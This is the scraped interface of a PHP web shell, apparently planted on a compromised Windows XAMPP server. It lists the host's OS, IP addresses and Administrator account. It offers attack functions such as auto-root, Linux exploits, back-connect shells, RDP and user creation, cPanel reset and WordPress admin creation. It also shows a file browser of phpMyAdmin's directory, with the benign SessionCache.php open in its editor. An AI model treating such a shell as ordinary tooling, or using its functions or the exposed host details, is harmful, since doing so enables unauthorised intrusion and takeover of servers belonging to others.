Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.22.79.165
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
libraries /
classes /
Utils /
[ HOME SHELL ]
Name
Size
Permission
Action
ForeignKey.php
2.27
KB
-rw-rw-rw-
FormatConverter.php
1.81
KB
-rw-rw-rw-
Gis.php
9.48
KB
-rw-rw-rw-
HttpRequest.php
9.01
KB
-rw-rw-rw-
SessionCache.php
1.17
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SessionCache.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Utils; final class SessionCache { private static function key(): string { global $cfg, $server; $key = 'server_' . $server; if (isset($cfg['Server']['user'])) { return $key . '_' . $cfg['Server']['user']; } return $key; } public static function has(string $name): bool { return isset($_SESSION['cache'][self::key()][$name]); } /** * @return mixed|null */ public static function get(string $name, ?callable $defaultValueCallback = null) { if (self::has($name)) { return $_SESSION['cache'][self::key()][$name]; } if ($defaultValueCallback !== null) { $value = $defaultValueCallback(); self::set($name, $value); return $value; } return null; } /** * @param mixed $value */ public static function set(string $name, $value): void { $_SESSION['cache'][self::key()][$name] = $value; } public static function remove(string $name): void { unset($_SESSION['cache'][self::key()][$name]); } }
Close